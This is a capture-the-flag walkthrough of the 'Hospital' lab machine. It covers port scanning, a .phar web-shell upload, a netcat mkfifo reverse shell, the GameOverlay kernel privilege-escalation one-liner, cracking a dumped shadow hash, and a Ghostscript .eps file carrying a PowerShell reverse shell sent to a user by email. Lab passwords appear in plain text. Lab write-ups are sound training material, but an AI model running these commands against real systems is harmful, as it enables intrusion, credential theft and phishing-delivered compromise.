Kariebi Victor

Hospital Nmap Scan # Nmap 7.94 scan initiated Sun Dec 3 01:35:00 2023 as: nmap -sCV -v PORT STATE SERVICE VERSION 22/tcp open OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 (Ubuntu Linux; protocol 2.0) ssh | ssh-hostkey: | 256 e1:4b:4b:3a:6d:18:66:69:39:f7:aa:74:b3:16:0a:aa (ECDSA) |_ 256 96:c1:dc:d8:97:20:95:e7:01:5f:20:a2:43:61:cb:ca (ED25519) 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time:-:35:18Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site- Name) | ssl-cert: Subject: commonName=DC | Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb | Issuer: commonName=DC | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before:-T10:49:03 | Not valid after: | MD5: -T10:49:03 04b1:adfe:746a:788e:36c0:802a:bdf3:3119 |_SHA-1: 17e5:8592:278f:4e8f:8ce1:554c:3550:9c02:2825:91e3 443/tcp open ssl/http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28) |_http-favicon: Unknown favicon MD5: 924A68D347C80D0E502157E83812BB23 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-title: Hospital Webmail :: Welcome to Hospital Webmail |_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28 |_ssl-date: TLS randomness does not represent time | tls-alpn: |_ http/1.1 | ssl-cert: Subject: commonName=localhost | Issuer: commonName=localhost | Public Key type: rsa | Public Key bits: 1024 | Signature Algorithm: sha1WithRSAEncryption | Not valid before:-T23:48:47 | Not valid after: | MD5: -T23:48:47 a0a4:4cc9:9e84:b26f:9e63:9f9e:d229:dee0 |_SHA-1: b023:8c54:7a90:5bfa:119c:4e8b:acca:eacf:3649:1ff6 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http 636/tcp open ldapssl? Microsoft Windows RPC over HTTP 1.0 | ssl-cert: Subject: commonName=DC | Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb | Issuer: commonName=DC | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before:-T10:49:03 | Not valid after: | MD5: -T10:49:03 04b1:adfe:746a:788e:36c0:802a:bdf3:3119 |_SHA-1: 17e5:8592:278f:4e8f:8ce1:554c:3550:9c02:2825:91e3 1801/tcp open msmq? 2103/tcp open msrpc Microsoft Windows RPC 2105/tcp open msrpc Microsoft Windows RPC 2107/tcp open msrpc Microsoft Windows RPC 2179/tcp open vmrdp? 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site- Name) | ssl-cert: Subject: commonName=DC | Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb | Issuer: commonName=DC | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before:-T10:49:03 | Not valid after: | MD5: -T10:49:03 04b1:adfe:746a:788e:36c0:802a:bdf3:3119 |_SHA-1: 17e5:8592:278f:4e8f:8ce1:554c:3550:9c02:2825:91e3 3269/tcp open globalcatLDAPssl? | ssl-cert: Subject: commonName=DC | Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb | Issuer: commonName=DC | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before:-T10:49:03 | Not valid after: | MD5: -T10:49:03 04b1:adfe:746a:788e:36c0:802a:bdf3:3119 |_SHA-1: 17e5:8592:278f:4e8f:8ce1:554c:3550:9c02:2825:91e3 3389/tcp open ms-wbt-server Microsoft Terminal Services | ssl-cert: Subject: commonName=DC.hospital.htb | Issuer: commonName=DC.hospital.htb | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before:-T18:39:34 | Not valid after: | MD5: -T18:39:34 0c8a:ebc2:3231:590c:2351:ebbf:4e1d:1dbc |_SHA-1: af10:4fad:1b02:073a:e026:eef4:8917:734b:f8e3:86a7 | rdp-ntlm-info: | Target_Name: HOSPITAL | NetBIOS_Domain_Name: HOSPITAL | NetBIOS_Computer_Name: DC | DNS_Domain_Name: hospital.htb | DNS_Computer_Name: DC.hospital.htb | DNS_Tree_Name: hospital.htb | Product_Version:- |_ System_Time:-T07:36:12+00:00 8080/tcp open http Apache httpd 2.4.55 ((Ubuntu)) |_http-server-header: Apache/2.4.55 (Ubuntu) | http-title: Login |_Requested resource was login.php | http-cookie-flags: | | /: PHPSESSID: |_ httponly flag not set | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-open-proxy: Proxy might be redirecting requests Service Info: Host: DC; OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 6h59m58s, deviation: 0s, median: 6h59m58s | smb2-time: | date:-T07:36:11 |_ start_date: N/A | smb2-security-mode: | |_ 3:1:1: Message signing enabled and required Mind Map From the nmap scan, you can tell this is WSL(Windows susbsystem for linux) running on windows from the version of the ssh server. Service Enumeration [+] Port 22 Version: OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 Public Exploit: None [+] Web Enumeration [+] Port 443 - Webmail Login There is a login page on port 443, but I don't have credentials to access that. I tried out default credentials for webmail but that wasn't successful. `` [+] Port 8080 - Hospital login page I find another login page, but I can create an account on this one. After creating an account, I have to upload my medical records in order to get more personalized treatment lol :) Trying to upload a php file, I got an error page Trying something else - Like a .phar file that was successful I uploaded powny shell and changed the file extension to .phar In order to get the upload directory, I used ffuf to bruteforce the directories and discovered a /uploads directory. Initial Access - Linux machine Got an interactive shell using the nc mkfifo shell > rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc- >/tmp/f Post Exploitation - Linux machine Gained shell as www-date so I need to escalate privileges to a standard user on the target - which is drwilliams in this case. listing the content of the web root directory, I found the config.php file for the hospital page which contained the password of the mysql database. Didn't get anything new from the database [+] Privilege Escalation Checking the kernel version running. I noticed that this version of ubuntu is vulnerable to Gameoverlay > unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash")' [+] Hash dumping and cracking Printing the content of the /etc/shadows file, I got the hash of drwilliams drwilliams:$6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/:19612:0: 99999:7::: cracking the hash of user `drwilliams` using john > john hash -w=/opt/word/rockyou.txt qwe123!@# Web Mail Using the credentials gotten for drwilliams, I can gain access to the web mail on port 443 Viewing the inbox of dr williams, I found a mail from dr brown. So, dr brown is expecting a file from dr williams that should contain the design of a new needle - The extension of the file should be .eps and should be able to be visualized using GhostScript. This means that any .eps file we send to Dr brown will be opened by them. Looking for possbile reverse shells in .eps, I found a recent command injection exploit affecting GhostScript. Initial Access Using this information I crafted a malicious .eps file. Leveraging the command injection vulnerability in ghostscript, injected a powershell reverse-shell into the .eps file and sent it as an attachment to Dr brown. > python3 ghostSPloit.py -g --payload "powershell -e JABjAG...." -x eps Start a netcat reverse shell, then send the file to Dr brown. I A couple seconds after, I got a reverse shell connection on the my netcat listener as dr brown. Post Exploitation [+] Privilege Escalation Found credentials for drbrown in the ghostscript.bat file chr!$br0wn Checking the owner of the htdocs folder Checking the permission of the c:/xampp/htdocs folder We can upload the same php web shell from before. And can get an administrative shell from that.